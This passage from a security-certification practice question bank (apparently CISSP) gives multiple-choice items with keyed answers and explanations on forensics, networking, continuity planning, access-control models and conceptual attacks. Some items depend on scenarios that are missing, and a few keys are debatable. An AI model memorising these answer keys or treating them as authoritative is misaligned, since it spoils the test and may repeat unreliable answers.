C. For any given finding to be deemed truly valid, the method for testing it must also be deemed both valid and repeatable by other analysts seeking to understand the nature and scope of the weakness exposed.

Which of the following is a necessary characteristic of evidence for it to be admissible? A. It must be real. B. It must be noteworthy. C. It must be reliable. D. It must be important.

C. For evidence to be admissible, it must be relevant, complete, sufficient, and reliable to the case. For evidence to be reliable, it must be consistent with fact and must not be based on opinion or be circumstantial.

Which of the following is a correct statement regarding digital forensics? A. It is the study of computer technology. B. It is a set of hardware-specific processes that must be followed in order for evidence to be admissible in a court of law. C. It encompasses network and code analysis, and may be referred to as electronic data discovery. D. Digital forensic responsibilities should be assigned to a network administrator before an incident occurs.

C. Forensics is a science and an art that requires specialized techniques for the recovery, authentication, and analysis of electronic data that could have been affected by a criminal act. It is the coming together of computer science, information technology, and engineering with the legal system. When discussing digital forensics with others, you might hear the terms computer forensics, network forensics, electronic data discovery, cyberforensics, and forensic computing. (ISC)2 uses digital forensics as a synonym for all of these other terms, so that's what you will most likely see on the CISSP exam. Digital forensics encompasses all domains in which evidence is in a digital or electronic form, either in storage or on the wire.

What is the purpose of the data link layer? A. End-to-end connection. B. Dialog control. C. Framing. D. Data syntax.

C. Framing.

Randy is a manager and responsible for business continuity training. He has been told the company needs training to allow personnel to validate their operational readiness for emergencies by performing their duties in a simulated operational environment. What type of training does Randy need to implement? A. Structured B. Operational C. Functional D. Interruption.

C. Functional

__________ is a software-testing technique that provides invalid, unexpected, or random data to the input interfaces of a program. A. Agile testing B. Structured testing C. Fuzzing D. EICAR

C. Fuzz testing, or fuzzing, is a software-testing technique that provides invalid, unexpected, or random data to the input interfaces of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted.

Which of the following is an international organization that helps different governments come together and tackle the economic, social, and governance challenges of a globalized economy and provides guidelines on the protection of privacy and transborder flows of personal data rules? A. Council of Global Convention on Cybercrime B. Council of Europe Convention on Cybercrime C. Organisation for Economic Co-operation and Development D. Organisation for Cybercrime Co-operation and Development

C. Global organizations that move data across other country boundaries must be aware of and follow the Organisation for Economic Co-operation and Development (OECD) Guidelines on the Protection of Privacy and Transborder Flows of Personal Data. Since most countries have a different set of laws pertaining to the definition of private data and how it should be protected, international trade and business get more convoluted and can negatively affect the economy of nations. The OECD is an international organization that helps different governments come together and tackle the economic, social, and governance challenges of a globalized economy. Because of this, the OECD came up with guidelines for the various countries to follow so that data is properly protected and everyone follows the same type of rules.

Which security architecture model defines how to securely develop access rights between subjects and objects? A. Brewer-Nash B. Clark-Wilson C. Graham-Denning D. Bell-LaPadula

C. Graham-Denning

Of the following, which represents the best programming? A. Low cohesion, low coupling. B. Low cohesion, high coupling. C. High cohesion, low coupling. D. High cohesion, high coupling.

C. High cohesion, low coupling.

Which of the following is not a drawback of using hot sites? A. Hot sites need security controls, as they usually contain mirrored copies of live production data. B. It's expensive to have full redundancy in hardware, software, communication lines, and applications. C. Hot sites are available immediately or within maximum tolerable downtime (MTD) D. Transaction redundancy controls need to be implemented to keep data up to date.

C. Hot sites are available immediately or within maximum tolerable downtime (MTD)

To get management's support and approval of the plan, a business case must be made. Which of the following is least important to this business case? A. Regulatory and legal requirements. B. Company vulnerabilities to disasters and disruptions. C. How other companies are dealing with these issues. D. The impact the company can endure if a disaster hits.

C. How other companies are dealing with these issues.

Which of the following is not a factor in determining the sensitivity of data? A. Who should be accessing the data. B. The value of the data. C. How the data will be used. D. The level of damage that could be caused should the data be exposed.

C. How the data will be used.

HTTP involves which of the following protocols at which layers of the OSI model? A. Hypertext transfer protocol at layer 4 over secure sockets layer at layer 3. B. Hypertext transfer protocol at layer 5 over secure sockets layer at layer 4. C. Hypertext transfer protocol at layer 6 over secure sockets layer at layer 5. D. Hypertext transfer protocol at layer 3 over secure sockets layer at layer 3.

C. Hypertext transfer protocol at layer 6 over secure sockets layer at layer 5

Which of the following standards would be most useful to you in ensuring your information security management system follows industry best practices? A. NIST SP 800-53 B. Six Sigma C. ISO/IEC 27000 series D. COSO IC

C. ISO/IEC 27000 series

Which ISO/IEC standard would be best for Jack to follow to meet his goals? A. ISO/IEC 27002 B. ISO/IEC 27004 C. ISO/IEC 27005 D. ISO/IEC 27006

C. ISO/IEC 27005 is the international standard for risk assessments and analysis.

Trent is the new manager of his company's internal software development department. He has been told by his management that the group needs to be compliant with the international standard that provides guidance to organizations in integrating security into the processes used for managing their applications. His new boss told him that he should join and get familiar with the Open Web Application Security Project (OWASP), and Trent just received an e-mail stating that one of the company's currently deployed applications has a zero-day vulnerability. Which of the following is most likely the standard Trent's company wants to comply with? A. ISO/IEC 27005 B. ISO/IEC 27001 C. ISO/IEC 27034 D. BS 7799

C. ISO/IEC 27034 is the international standard that provides guidance to organizations in integrating security into the processes used for managing their applications. It is applicable to in-house developed applications, applications acquired from third parties, and cases where the development or the operation of the application is outsourced.

You are looking to implement an access control on your system's resources. The steps of your access control model should follow which logical flow? A. Identification, Authorization, Authentication. B. Authorization, Identification, Authentication. C. Identification, Authentication, Authorization. D. Identification, Accountability, Authorization.

C. Identification, Authentication, Authorization.

John is responsible for providing a weekly report to his manager outlining the week's security incidents and mitigation steps. What steps should he take if a report has no information? A. Send his manager an e-mail telling her so. B. Deliver last week's report and make sure it's clearly dated. C. Deliver a report that states "No output." D. Don't do anything.

C. If a report has no information (nothing to report), it should state, "No output." This ensures that the manager is aware that there is no information to report and that John isn't just slacking in his responsibilities.

Which of the following best describes the most critical problem with "running as root"? A. If an administrator always logs in as a privileged user, any mistake that they make may critically misconfigure or destabilize the system. B. If all administrators log in as "root" or "administrator," it can be impossible to audit which administrator took which action or made which change. C. If an administrator is tricked by attackers into executing malicious software, that software will run with the administrative level of privilege, which is commonly system level. D. "Running as root" implies that the system is a Unix/Linux system, which is much more complex to secure than a Windows server.

C. If an administrator is tricked by attackers into executing malicious software, that software will run with the administrative level of privilege, which is commonly system level.

Which of the following best describes how an address bus and a data bus are used for instruction execution? A. The CPU sends a "fetch" request on the data bus, and the data residing at the requested address is returned on the address bus. B. The CPU sends a "get" request on the address bus, and the data residing at the requested address is returned on the data bus. C. The CPU sends a "fetch" request on the address bus, and the data residing at the requested address is returned on the data bus. D. The CPU sends a "get" request on the data bus, and the data residing at the requested address is returned on the address bus.

C. If the CPU needs to access some data, either from memory or from an I/O device, it sends a "fetch" request on the address bus. The fetch request contains the address of where the needed data is located. The circuitry associated with the memory or I/O device recognizes the address the CPU sent down the address bus and instructs the memory or device to read the requested data and put it on the data bus. So the address bus is used by the CPU to indicate the location of the needed information, and the memory or I/O device responds by sending the information that resides at that memory location through the data bus.

George is responsible for setting and tuning the thresholds for his company's behavior-based IDS. Which of the following outlines the possibilities of not doing this activity properly? A. If the threshold is set too low, nonintrusive activities are considered attacks (false positives). If the threshold is set too high, malicious activities are not identified (false negatives). B. If the threshold is set too low, nonintrusive activities are considered attacks (false negatives). If the threshold is set too high, malicious activities are not identified (false positives). C. If the threshold is set too high, nonintrusive activities are considered attacks (false positives). If the threshold is set too low, malicious activities are not identified (false negatives). D. If the threshold is set too high, nonintrusive activities are considered attacks (false positives). If the threshold is set too high, malicious activities are not identified (false negatives).

C. If the threshold is set too high, nonintrusive activities are considered attacks (false positives). If the threshold is set too low, malicious activities are not identified (false negatives).

What condition allows a buffer overflow to happen? A. Code that makes improper use of random access memory. B. Improper use of discretionary access control lists. C. Improper checks in code with regard to the size of input data. D. Sending large amounts of data over a network.

C. Improper checks in code with regard to the size of input data.

Which option best describes the difference between HMAC and CBC-MAC? A. HMAC creates a message digest and is used for integrity; CBC-MAC is used to encrypt blocks of data for confidentiality. B. HMAC uses a symmetric key and a hashing algorithm; CBC-MAC uses the first block for the checksum. C. HMAC provides integrity and data origin authentication; CBC-MAC uses a block cipher for the process of creating a MAC. D. HMAC encrypts a message with a symmetric key and then puts the result through a hashing algorithm; CBC-MAC encrypts the whole message.

C. In an HMAC operation, a message is concatenated with a symmetric key and the result is put through a hashing algorithm. This provides integrity and system or data authentication. CBC-MAC uses a block cipher to create a MAC, which is the last block of ciphertext.

Phishing and pharming are similar. Which of the following correctly describes the difference between phishing and pharming? A. Personal information is collected from victims through legitimate-looking websites in phishing attacks, while personal information is collected from victims via e-mail in pharming attacks. B. Phishing attacks point e-mail recipients to a form where victims input personal information, while pharming attacks use pop-up forms at legitimate websites to collect personal information from victims. C. Victims are pointed to a fake website with a domain name that looks similar to a legitimate site's domain name in a phishing attack, while victims are directed to a fake website as a result of a legitimate domain name being incorrectly translated by the DNS server in a pharming attack. D. Phishing is a technical attack, while pharming is a type of social engineering.

C. In both phishing and pharming, attackers can create websites that look very similar to legitimate sites in an effort to collect personal information from victims. In a phishing attack, attackers can provide URLs with domain names that look very similar to the legitimate site's address. For example, www.amazon.com might become www.amzaon.com. Or they can use a specially placed @ symbol. For example, www.msn.com@notmsn.com would actually take the victim to the website notmsn.com and provide the username of www.msn.com to this website. The username www.msn.com would not be a valid username for notmsn.com, so the victim would just be shown the home page of notmsn.com. Now, notmsn.com is a nefarious site created to look and feel just like www.msn.com. The victim feels he is at the legitimate site and logs in with his credentials. In a pharming attack, the victim is given a legitimate domain name, but that domain name is redirected to the attacker's website as a result of DNS poisoning. When the DNS server is poisoned to carry out a pharming attack, the records have been changed so that instead of sending the correct IP address for www.logicalsecurity.com, it sends the IP address of a legitimate-looking, but fake, website created by the attacker.

Don is a senior manager of an architectural firm. He has just found out that a key contract was renewed, allowing the company to continue developing an operating system that was idle for several months. Excited to get started, Don begins work on the operating system privately, but cannot tell his staff until the news is announced publicly in a few days. However, as Don begins making changes in the software, various staff members notice changes in their connected systems, even though they work in a lower security level. What kind of model could be used to ensure this does not happen? A. Biba B. Bell-LaPadula C. Noninterference D. Clark-Wilson

C. In this example, lower-ranked staffers could have deduced that the contract had been renewed by paying attention to the changes in their systems. The noninterference model addresses this specifically by dictating that no action or state in higher levels can impact or be visible to lower levels. In this example, the staff could learn something indirectly or infer something that they do not have a right to know yet.

If Josh is correct in his assumptions, which of the following best describes the vulnerability, threat, and exposure, respectively? A. E-mail server is hardened, an entity could exploit programming code flaw, server is compromised and leaking data. B. E-mail server is not patched, an entity could exploit a vulnerability, server is hardened. C. E-mail server misconfiguration, an entity could exploit misconfiguration, server is compromised and leaking data. D. DMZ firewall misconfiguration, an entity could exploit misconfiguration, internal e-mail server is compromised.

C. In this situation the e-mail server most likely is misconfigured or has a programming flaw that can be exploited. Either of these would be considered a vulnerability. The threat is that someone would find out about this vulnerability and exploit it. In this scenario, since the server is compromised, it is the item that is providing exposure to the company. This exposure is allowing sensitive data to be accessed in an unauthorized manner.

Next-generation firewalls combine the best attributes of other types of firewalls. Which of the following is not a common characteristic of these firewall types? A. Integrated intrusion prevention system B. Sharing signatures with cloud-based aggregators C. Automated incident response D. High cost

C. Incident response typically requires humans in the loop. Next-generation firewalls (NGFWs) do not completely automate the process of responding to security incidents. NGFWs typically involve integrated IPS and signature sharing capabilities with cloud-based aggregators, but are also significantly more expensive than other firewall types.

If different user groups with different security access levels need to access the same information, which of the following actions should management take? A. Decrease the security level on the information to ensure the accessibility and usability of the information. B. Require specific written approval each time an individual needs to access the information. C. Increase the security controls on the information. D. Decrease the classification label on the information.

C. Increase the security controls on the information.

Which of the following will not be identified by a business impact analysis? A. Areas that would suffer the greatest financial or operational loss in the event of a disaster. B. Systems critical to the survival of the enterprise. C. Individuals to be contacted during a disaster. D. The outage time that can be tolerated by the enterprise as a result of a disaster.

C. Individuals to be contacted during a disaster.

Brad is a security manager at Thingamabobs, Inc. He is preparing a presentation for his company's executives on the risks of using instant messaging (IM) and his reasons for wanting to prohibit its use on the company network. Which of the following should not be included in his presentation? A. Sensitive data and files can be transferred from system to system over IM. B. Users can receive information—including malware—from an attacker posing as a legitimate sender. C. IM use can be stopped by simply blocking specific ports on the network firewalls. D. A security policy is needed specifying IM usage restrictions.

C. Instant messaging (IM) allows people to communicate with one another through a type of real-time and personal chat room. It alerts individuals when someone who is on their "buddy list" has accessed the intranet/Internet so that they can send text messages back and forth in real time. The technology also allows for files to be transferred from system to system. The technology is made up of clients and servers. The user installs an IM client (AOL, ICQ, Yahoo Messenger, and so on) and is assigned a unique identifier. This user gives out this unique identifier to people whom she wants to communicate with via IM. Blocking specific ports on the firewalls is not usually effective because the IM traffic may be using common ports that need to be open (HTTP port 80 and FTP port 21). Many of the IM clients autoconfigure themselves to work on another port if their default port is unavailable and blocked by the firewall.

Interface testing could involve which of the following? A. The application programming interface (API) B. The graphical user interface (GUI) C. Both of the above D. None of the above

C. Interface testing covers the exchange points within different components of the system. The API is the exchange point between the system and the libraries it leverages, while the GUI is the exchange point between the system and the users. Testing either of these would constitute an interface test.

Which of the following technologies integrates previously independent security solutions with the goal of providing simplicity, centralized control, and streamlined processes? A. Network convergence B. Security as a service C. Unified threat management D. Integrated convergence management

C. It has become very challenging to manage the long laundry list of security solutions almost every network needs to have in place. The list includes, but is not limited to, firewalls, antimalware, antispam, IDS/IPS, content filtering, data leak prevention, VPN capabilities, and continuous monitoring and reporting. Unified threat management (UTM) appliance products have been developed that provide all (or many) of these functionalities in a single network appliance. The goals of UTM are simplicity, streamlined installation and maintenance, centralized control, and the ability to understand a network's security from a holistic point of view.

For evidence to be legally admissible, it must be relevant, complete, sufficient, and reliably obtained. Which characteristic refers to the evidence having a reasonable and sensible relationship to the findings? A. Complete B. Reliable C. Relevant D. Sufficient

C. It is important that evidence be admissible, relevant, complete, sufficient, and reliable to the case at hand. These characteristics of evidence provide a foundation for a case and help ensure that the evidence is legally permissible. For evidence to be authentic, or relevant, it must have a reasonable and sensible relationship to the findings. If a judge rules that a person's past traffic tickets cannot be brought up in a murder trial, this means the judge has ruled that the traffic tickets are not relevant to the case at hand. Thus, the prosecuting lawyer cannot even mention them in court. In addition, authentic evidence must be original; that is, it cannot be a copy or a summary of the original.

It is important to deal with the issue of "reasonable expectation of privacy" (REP) when it comes to employee monitoring. In the U.S. legal system, the expectation of privacy is used when defining the scope of the privacy protections provided by the A. Federal Privacy Act B. PATRIOT Act C. Fourth Amendment of the Constitution D. Bill of Rights

C. It is important to deal with the issue of "reasonable expectation of privacy" (REP) when it comes to employee monitoring. In the U.S. legal system the expectation of privacy is used when defining the scope of the privacy protections provided by the Fourth Amendment of the Constitution. If it is not specifically explained to an employee that monitoring is possible and/or probable, when the monitoring takes place he could claim that his privacy rights have been violated and launch a civil suit against a company.

Sally is responsible for key management within her organization. Which of the following incorrectly describes a principle of secure key management? A. Keys should be backed up or escrowed in case of emergencies. B. The more a key is used, the shorter its lifetime should be. C. Less secure data allows for a shorter key lifetime. D. Keys should be stored and transmitted by secure means.

C. Key management is critical for proper protection. Part of key management is determining the lifespan of keys. The key's lifetime should correspond with the sensitivity of the data it is protecting. Less secure data may allow for a longer key lifetime, whereas more sensitive data might require a shorter key lifetime. Keys should be properly destroyed when their lifetime comes to an end. The processes of changing and destroying keys should be automated and hidden from the user. They should be integrated into software or the operating system. It only adds complexity and opens the doors for more errors when processes are done manually and depend upon end users to perform certain functions.

Which of the following is true about key risk indicators (KRIs)? A. They tell managers where an organization stands with regard to its goals. B. They are inputs to the calculation of single loss expectancy (SLE). C. They tell managers where an organization stands with regard to its risk appetite. D. An interpretation of one or more metrics that describes the effectiveness of the ISMS.

C. Key risk indicators (KRIs) allow managers to understand when specific activities of the organization are moving it toward a higher level of risk. They are useful to understanding changes and managing the overall risk.

Some organizations over-issue privileged access to ensure that users can have access to devices in emergency situations or unconventional scenarios. This practice violates what standard security principle? A. Separation of duties. B. Job rotation. C. Least privilege. D. Due diligence.

C. Least privilege.

Which of the following is a control that Greg's team could implement to address the network administrator's issue? A. Secondary feeder line. B. Insulated grounded wiring. C. Line conditioner. D. Generator.

C. Line conditioner.

Sue needs to identify a storage system technology that reduces both wear on the drives and also reduces power consumption. Which of the following technologies is the best fit for these types of requirements? A. RAIT B. RAID C. MAID D. TAT

C. MAID

Kirk is a software developer who is diligently writing code for a new program. To save time, he creates a hidden access point within the program so that he can immediately begin work and bypass the security controls. Kirk has created a mechanism which can be called any of the following terms, except: A. Maintenance hook. B. Backdoor. C. Malware. D. Trapdoor.

C. Malware.

Todd documents several fraud opportunities that the employees have at the financial institution so that management understands these risks and allocates the funds and resources for his suggested solutions. Which of the following best describes the control Todd should put into place to be able to carry out fraudulent investigation activity? A. Separation of duties B. Rotation of duties C. Mandatory vacations D. Split knowledge

C. Mandatory vacations

When an organization splits naming zones, the names of its hosts that are accessible only from an intranet are hidden from the Internet. Which of the following best describes why this is done? A. To prevent attackers from accessing servers B. To prevent the manipulation of the hosts file C. To avoid providing attackers with valuable information that can be used to prepare an attack D. To avoid providing attackers with information needed for cyber squatting

C. Many companies have their own internal DNS servers to resolve their internal hostnames. These companies usually also use the DNS servers at their ISPs to resolve hostnames on the Internet. An internal DNS server can be used to resolve hostnames on the entire network, but usually more than one DNS server is used so that the load can be split up and so that redundancy and fault tolerance are in place. Within DNS servers, networks are split into zones. One zone may contain all hostnames for the marketing and accounting departments, and another zone may contain hostnames for the administration, research, and legal departments. It is a good idea to split DNS zones when possible so that the names of hosts that are accessible only from an intranet are not visible from the Internet. This information is valuable to an attacker who is planning an attack because it can lead to other information, such as the network structure, organizational structure, or server operating systems.

Robert is responsible for implementing a common architecture used when customers need to access confidential information through Internet connections. Which of the following best describes this type of architecture? A. Two-tiered model B. Screened subnet C. Three-tiered model D. Public and private DNS zones

C. Many of today's e-commerce architectures use a three-tiered architecture approach. The three-tier architecture is a client/server architecture in which the user interface, functional process logic, and data storage run as independent components that are developed and maintained, often on separate platforms. The three-tier architecture allows for any one of the tiers to be upgraded or modified as needed without affecting the other two tiers because of its modularity. In the case of e-commerce, the presentation layer is a front-end web server that users interact with. It can serve both static and cached dynamic content. The business logic layer is where the request is reformatted and processed. This is commonly a dynamic content processing and generation-level application server. The data storage is where the sensitive data is held. It is a back-end database that holds both the data and the database management system software that is used to manage and provide access to the data. The separate tiers may be connected with middleware and run on separate physical servers.

What is the most important reason war dialing is still a concern for modern security assessments? A. Free tools exist that make it easy for an attacker to scan huge blocks of phone numbers. B. Some tools are relatively sophisticated and can fingerprint the systems that answer, enabling further automation. C. Many organizations still employ modems for backup communications, in a way that is not well secured. D. Modern, advanced private branch exchanges (PBXs) can make an attacker's job even easier through telephony diagnostic tools.

C. Many organizations still employ modems for backup communications, in a way that is not well secured.

Why should employers make sure employees take their vacations? A. They have a legal obligation. B. It is part of due diligence. C. It is a way for fraud to be uncovered. D. To ensure the employee does not get burnt out.

C. Many times, employees who are carrying out fraudulent activities do not take the vacation they have earned because they do not want anyone to find out what they have been doing. Forcing employees to take vacations means that someone else has to do that person's job and can possibly uncover any misdeeds.

Which of the following best describes why there was a performance issue in the context of the scenario? A. Bloated programming code. B. I/O and memory location procedures. C. Mode transitions. D. Data and address bus architecture.

C. Mode transitions.

Which of the following does NOT correctly describe a directory service? A. It manages objects within a directory by using namespaces. B. It enforces security policy by carrying out access control and identity management functions. C. It assigns namespaces to each object in databases that are based on the X.509 standard and are accessed by LDAP. D. It allows an administrator to configure and manage how identification takes place within the network.

C. Most enterprises have some type of directory that contains information pertaining to the company's network resources and users. Most directories follow a hierarchical database format, based on the X.500 standard (not X.509), and a type of protocol, as in Lightweight Directory Access Protocol (LDAP), that allows subjects and applications to interact with the directory. Applications can request information about a particular user by making an LDAP request to the directory, and users can request information about a specific resource by using a similar request. A directory service assigns distinguished names (DNs) to each object in databases based on the X.500 standard that are accessed by LDAP. Each distinguished name represents a collection of attributes about a specific object and is stored in the directory as an entry.

What is one of the first steps in developing a business continuity plan? A. Identify a backup solution. B. Perform a simulation test. C. Perform a business impact analysis. D. Develop a business resumption plan.

C. Perform a business impact analysis.

Rebecca is an internal auditor for a large retail company. The company has a number of web applications that run critical business processes with customers and partners around the world. Her company would like to ensure the security of technical controls on these processes. Which of the following would not be a good approach to auditing these technical controls? A. Log reviews B. Code reviews C. Personnel background checks D. Misuse case testing

C. Personnel background checks are a common administrative (not technical) control. This type of audit would have nothing to do with the web applications themselves. The other three options (log reviews, code reviews, misuse case testing) are typical ways in which we verify the effectiveness of our technical controls.

June is creating a security awareness program to inform the workforce of a change in security policy. Which stage of the common development process of security policy is June in? A. Initial and evaluation. B. Development. C. Publication. D. Implementation.

C. Publication.

Diane has to brief her CIO on the best product and protocol to use for the company's centralized remote access control technology. Which of the following are true statements pertaining to the more appropriate use of TACACS+ versus RADIUS? A. TACACS+ is best if an environment only needs simplistic username/password authentication and RADIUS is better for environments that require more complex and tighter controls. C. RADIUS is best if an environment only needs simplistic username/password authentication and TACACS+ is better for environments that require more complex and tighter controls. D. TACACS+ allows for a peer-to-peer relationship between the client and server, and RADIUS works in a purely client/server model.

C. RADIUS is best if an environment only needs simplistic username/password authentication and TACACS+ is better for environments that require more complex and tighter controls.

Which of the following has correct RAID level mappings? A. RAID 3 - block-level parity. B. RAID 4 - byte-level parity. C. RAID 5 - interleave parity. D. RAID 1 - Hamming code parity.

C. RAID 5 - interleave parity.

How does water suppress a fire? A. Modifies the chemical combustion elements. B. Reduces the fuel. C. Reduces the temperature. D. Reduces the oxygen.

C. Reduces the temperature.

Which of the following best describes the mitigation of data remanence by a degaussing destruction process? A. Replacing the 1's and 0's that represent data on storage media with random or fixed patterns of 1's and 0's B. Converting the 1's and 0's that represent data with the output of a cryptographic function C. Removing or reducing the magnetic field patterns on conventional disk drives or tapes D. Exposing storage media to caustic or corrosive chemicals that render it unusable

C. Removing or reducing the magnetic field patterns on conventional disk drives or tapes

Which of the following statements is correct regarding the designated retention period for data? A. Business documents (e.g., meeting minutes) must be retained for 7 years. B. Invoices must be retained for 5 years. C. Requirements may vary, so consult an attorney. D. There are no designated standards, only best practice.

C. Requirements may vary, so consult an attorney.

Based on quantitative calculations, the company has determined that by implementing a better firewall, they will reduce their risk exposure by 80 percent. What does the other 20 percent represent? A. Single loss expectancy B. Annualized loss expectancy. C. Residual risk. D. Vulnerability percentage.

C. Residual risk.

Tape library management is an example of operations security through which of the following? A. Archival retention. B. Reviewing clipping levels. C. Resource protection. D. Change management.

C. Resource protection.

All of the following attacks are considered technical attacks except: A. differential cryptanalysis. B. Linear cryptanalysis. C. Rubber hose cryptanalysis D. Algebraic cryptanalysis

C. Rubber hose cryptanalysis

What is the imaginary boundary that separates components that maintain security from components that are not security related? A. Reference monitor B. Security kernel C. Security perimeter D. Security policy

C. Security perimeter

Alex works for a chemical distributor that assigns employees tasks that separate their duties and routinely rotates job assignments. Which of the following best describes the differences between these countermeasures? A. They are the same thing with different titles. B. They are administrative controls that enforce access control and protect the company's resources. C. Separation of duties ensures that one person cannot perform a high-risk task alone, and job rotation can uncover fraud because more than one person knows the tasks of a position. D. Job rotation ensures that one person cannot perform a high-risk task alone, and separation of duties can uncover fraud because more than one person knows the tasks of a position.

C. Separation of duties and job rotation are two security controls commonly used within companies to prevent and detect fraud. Separation of duties is put into place to ensure that one entity cannot carry out a task that could be damaging or risky to the company. It requires two or more people to come together to do their individual tasks to accomplish the overall task. Rotation of duties helps ensure that one person does not stay in one position for a long period of time because he may end up having too much control over a segment of the business. Such total control could result in fraud, data modification, and misuse of resources.

John does systems maintenance for his department and is also responsible for performing the operational security audit once a year. What security management principle is John violating? A. Operational integrity. B. Collusion. C. Separation of duties. D. Nondisclosure.

C. Separation of duties.

After a computer forensic investigator seizes a computer during a crime investigation, what is the next step? A. Label and put it into a container, and then label the container B. Dust the evidence for fingerprints C. Make an image copy of the disks D. Lock the evidence in the safe

C. Several steps need to be followed when gathering and extracting evidence from a scene. Once a computer has been confiscated, the first thing the computer forensics team should do is make an image of the hard drive. The team will work from this image instead of the original hard drive so that the original stays in a pristine state and the evidence on the drive is not accidentally corrupted or modified.

Mike's company has just been hired to do a one-time contract certification of a newly implemented network center for a small dispatching company. As part of the contract, Mike includes a checklist of the tasks his team will perform during the certification. Which task below would not belong on the list? A. Test network connectivity to all specified devices. B. Verify security controls are functioning properly. C. Sign off on the platform as meeting all security objectives stated. D. Verify that auditing mechanisms function properly.

C. Sign off on the platform as meeting all security objectives stated.

Which of the following is an XML-based protocol that defines the schema of how web service communication takes place over HTTP transmissions? A. Service-Oriented Protocol B. Active X Protocol C. Simple Object Access Protocol D. Web Ontology Language

C. Simple Object Access Protocol (SOAP) enables programs running on different operating systems and written in different programming languages to communicate over web-based communication methods. SOAP is an XML-based protocol that encodes messages in a web service environment. SOAP actually defines an XML schema or a structure of how communication is going to take place. The SOAP XML schema defines how objects communicate directly.

Roger calls into a customer service center and pretends to be affiliated with the company in order to gain secured information. What tactic is Roger using? A. Tailgating. B. Dumpster diving. C. Social engineering. D. Sniffing.

C. Social engineering.

What set of protocols corresponds to the following layers: application, data link, network, and transport? A. FTP, ARP, TCP, and UDP B. FTP, ICMP, IP, and UDP C. TFTP, ARP, IP, and UDP D. TFTP, RARP, IP, and ICMP

C. TFTP, ARP, IP, and UDP

Several teams should be involved in carrying out the business continuity plan. Which team is responsible for starting the recovery of the original site? A. Damage assessment team B. BCP team C. Salvage team D. Restoration team

C. The BCP coordinator should have an understanding of the needs of the company and the types of teams that need to be developed and trained. Employees should be assigned to the specific teams based on their knowledge and skill set. Each team needs to have a designated leader, who will direct the members and their activities. These team leaders will be responsible not only for ensuring that their team's objectives are met, but also for communicating with each other to make sure each team is working in parallel phases. The salvage team is responsible for starting the recovery of the original site. It is also responsible for backing up data from the alternate site and restoring it within the new facility, carefully terminating contingency operations, and securely transporting equipment and personnel to the new facility.

What type of rating system is used within the Common Criteria structure? A. PP B. EPL C. EAL D. A-D

C. The Common Criteria uses a different assurance rating system than the previously used criteria. It has packages of specifications that must be met for a product to obtain the corresponding rating. These ratings and packages are called Evaluation Assurance Levels (EALs).

What type of rating is used within the Common Criteria framework? A. PP B. EPL C. EAL D. A-D

C. The Common Criteria uses a different assurance rating system than the previously used criteria. It has packages of specifications that must be met for a product to obtain the corresponding rating. These ratings and packages are called Evaluation Assurance Levels (EALs). Once a product achieves any type of rating, customers can view this information on an Evaluated Products List (EPL).

Use the following scenario to answer Questions 28-29. Robbie is the security administrator of a company that needs to extend its remote access functionality. Employees travel around the world, but still need to be able to gain access to corporate assets such as databases, servers, and network-based devices. Also, while the company has had a VoIP telephony solution in place for two years, it has not been integrated into a centralized access control solution. Currently the network administrators have to maintain access control separately for internal resources, external entities, and VoIP end systems. Robbie has also been asked to look into some suspicious e-mails that the CIO's secretary has been receiving, and her boss has asked her to remove some old modems that are no longer being used for remote dial-in purposes. Which of the following is the best remote access technology for this situation? A. RADIUS B. TACACS+ C. Diameter D. Kerberos

C. The Diameter protocol extends the RADIUS protocol to allow for various types of authentication to take place with a variety of different technologies (PPP, VoIP, Ethernet, etc.). It has extensive flexibility and allows for the centralized administration of access control.

Larry is a seasoned security professional and knows the potential dangers associated with using an ISP's DNS server for Internet connectivity. When Larry stays at a hotel or uses his laptop in any type of environment he does not fully trust, he updates values in his HOSTS file. Which of the following best describes why Larry carries out this type of task? A. Reduces the risk of an attacker sending his system a corrupt ARP address that points his system to a malicious website B. Ensures his host-based IDS is properly updated C. Reduces the risk of an attacker sending his system an incorrect IP address-to-host mapping that points his system to a malicious website D. Ensures his network-based IDS is properly synchronized with his host-based IDS

C. The HOSTS file resides on the local computer and can contain static hostname-to-IP mapping information. If you do not want your system to query a DNS server, you can add the necessary data in the HOSTS file, and your system will first check its contents before reaching out to a DNS server. Some people use these files to reduce the risk of an attacker sending their system a bogus IP address that points them to a malicious website.

Which standard should Jack suggest to his boss for compliance? A. BS 17799 B. ISO/IEC 27004 C. ISO/IEC 27799 D. BS 7799:2011

C. The ISO/IEC 27799 is a guideline for information security management in health organizations. It deals with how organizations that store and process sensitive medical information should protect it.

Which of the following protocols or set of protocols is used in Voice over IP (VoIP) for caller identification? A. Real-time Transport Protocol (RTP) and/or Secure Real-time Transport Protocol (SRTP) B. Real-time Transport Protocol (RTP) and Real-time Transport Control Protocol (RTCP) C. Session Initiation Protocol (SIP) D. Public Switched Telephony/Phone Branch Exchange (PSTN/PBX)

C. The Session Initiation Protocol is commonly used for all VoIP transactions except the actual media exchange between calling or receiving stations. This includes caller identification and location, call setup and teardown, etc. It is brokered by a mutually trusted third-party system that contains registration information for each station/user.

Which of the following statements does not correctly describe SOAP and Remote Procedure Calls? A. SOAP was designed to overcome the compatibility and security issues associated with Remote Procedure Calls. B. Both SOAP and Remote Procedure Calls were created to enable application-layer communication. C. SOAP enables the use of Remote Procedure Calls for information exchange between applications over the Internet. D. HTTP was not designed to work with Remote Procedure Calls, but SOAP was designed to work with HTTP.

C. The Simple Object Access Protocol (SOAP) was created to use instead of Remote Procedure Calls (RPCs) to allow applications to exchange information over the Internet. SOAP is an XML-based protocol that encodes messages in a web service setup. It allows programs running on different operating systems to communicate over web-based communication methods.

How does TKIP provide more protection for WLAN environments? A. It uses the AES algorithm. B. It decreases the IV size and uses the AES algorithm. C. It adds more keying material. D. It uses MAC and IP filtering.

C. The TKIP protocol actually works with WEP by feeding it keying material, which is data to be used for generating random keystreams. TKIP increases the IV size, ensures it is random for each packet, and adds the sender's MAC address to the keying material.

Brian, a security administrator, is responding to a virus infection. The antivirus application reports that a file has been infected with a dangerous virus and disinfecting it could damage the file. What course of action should Brian take? A. Replace the file with the file saved from the day before. B. Disinfect the file and contact the vendor. C. Restore an uninfected version of the patched file from backup media. D. Back up the data and disinfect the file.

C. The best course of action is to install an uninfected version of a patched file from backup media. Attempts to disinfect the file could corrupt it, and it is important to restore a file that is known to be "clean."

The CA is responsible for revoking certificates when necessary. Which of the following correctly describes a CRL and OCSP? A. The CRL was developed as a more streamlined approach to OCSP. B. OCSP is a protocol that submits revoked certificates to the CRL. C. OCSP is a protocol developed specifically to check the CRL during a certificate validation process. D. CRL carries out real-time validation of a certificate and reports to the OCSP.

